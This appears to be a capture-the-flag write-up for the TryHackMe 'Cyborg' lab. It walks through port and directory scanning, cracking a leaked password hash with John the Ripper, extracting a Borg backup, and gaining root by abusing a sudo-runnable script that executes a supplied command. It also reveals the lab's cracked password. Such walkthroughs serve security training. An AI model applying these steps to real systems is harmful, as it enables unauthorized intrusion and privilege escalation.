Cyborg
January 04, 2024
Task 1 - Deploy the machine
Deploy the machine
No answer needed
Task 2 - Compromise the system
Scan the machine, how many ports are open?
2
What service is running on port 22?
ssh
What service is running on port 80?
http
What is the user.txt flag?
THM
What is the root.txt flag?
THM
nmap -sC -sV -oN nmap 10.10.47.92 -Pn -vv
# Nmap 7.93 scan initiated Thu Jan 4 15:16:12 2024 as: nmap -sC -sV -oN nmap -Pn -vv 10.10.43.109
Increasing send delay for 10.10.43.109 from 0 to 5 due to 58 out of 192 dropped probes since last increase.
Nmap scan report for 10.10.43.109
Host is up, received user-set (0.31s latency).
Scanned at 2024-01-04 15:16:12 PST for 44s
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dbb270f307ac32003f81b8d03a89f365 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtLmojJ45opVBHg89gyhjnTTwgEf8lVKKbUfVwmfqYP9gU3fWZD05rB/4p/qSoPbsGWvDUlSTUYMDcxNqaADH/nk58URDIiFMEM6dTiMa0grcKC5u4NRxOCtZGHTrZfiYLQKQkBsbmjbb5qpcuhYo/tzhVXsrr592Uph4iiUx8zhgfYhqgtehMG+UhzQRjnOBQ6GZmI4NyLQtHq7jSeu7ykqS9KEdkgwbBlGnDrC7ke1I9352lBb7jlsL/amXt2uiRrBgsmz2AuF+ylGha97t6JkueMYHih4Pgn4X0WnwrcUOrY7q9bxB1jQx6laHrExPbz+7/Na9huvDkLFkr5Soh
| 256 68e6852f69655be7c6312c8e4167d7ba (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB5OB3VYSlOPJbOwXHV/je/alwaaJ8qljr3iLnKKGkwC4+PtH7IhMCAC3vim719GDimVEEGdQPbxUF6eH2QZb20=
| 256 562c7992ca23c3914935fadd697ccaab (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlr5id6IfMeWb2ZC+LelPmOMm9S8ugHG2TtZ5HpFuZQ
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jan 4 15:16:56 2024 -- 1 IP address (1 host up) scanned in 43.88 seconds
gobuster dir -u http://10.10.47.92 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.47.92
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2024/01/05 07:45:00 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 310] [--> http://10.10.47.92/admin/]
/etc (Status: 301) [Size: 308] [--> http://10.10.47.92/etc/]
Progress: 1526 / 220561 (0.69%) ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2024/01/05 07:46:01 Finished
===============================================================After that we can browse the admin section which we can see there is a file in the archive section which we can download.
mv ~/Downloads/archive.tar .tar -xvf archive.tarAfter download extract the tar file into your directory
After that we can navigate to /etc sub directory in the browser
We can see here we have a MD5 hash that we can crack
We will use john the ripper for hash cracking
cat for-john
$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.john --wordlist=/usr/share/wordlists/rockyou.txt for-john
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 512/512 AVX512BW 16x3])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
squidward (?)
1g 0:00:00:00 DONE (2024-01-05 08:44) 8.333g/s 332800p/s 332800c/s 332800C/s jeremy21..pirilampo
Use the "--show" option to display all of the cracked passwords reliably
Session completedAfter john crack the md5 hash we now have a passphrase key which is squidward
As we navigate to the admin shoutbox we can see some keywords like "music_archive"
Then we can extract the backup using borg command and use "squidward" for key
borg extract home/field/dev/final_archive::music_archive
Enter passphrase for key /home/kyou/tryhackme-writeups/Cyborg/home/field/dev/final_archive: After that we can now see we have a new user in the home directory
After that we can sudo -l see if there is any commands that we can run using sudo
Then use this command to view the root.txt
Or we can use this other way
Go to the file folder of that sudo file
Then include write permission to that command
cat backup.sh
#!/bin/bash
sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt
input="/etc/mp3backups/backed_up_files.txt"
#while IFS= read -r line
#do
#a="/etc/mp3backups/backed_up_files.txt"
# b=$(basename $input)
#echo
# echo "$line"
#done < "$input"
while getopts c: flag
do
case "${flag}" in
c) command=${OPTARG};;
esac
done
backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"
# Where to backup to.
dest="/etc/mp3backups/"
# Create archive filename.
hostname=$(hostname -s)
archive_file="$hostname-scheduled.tgz"
# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"
echo
# Backup the files using tar.
tar czf $dest/$archive_file $backup_files
# Print end status message.
echo
echo "Backup finished"
cmd=$($command)
echo $cmd
/bin/bashjust add "/bin/bash" at the end and it will move your privilege to root
Last updated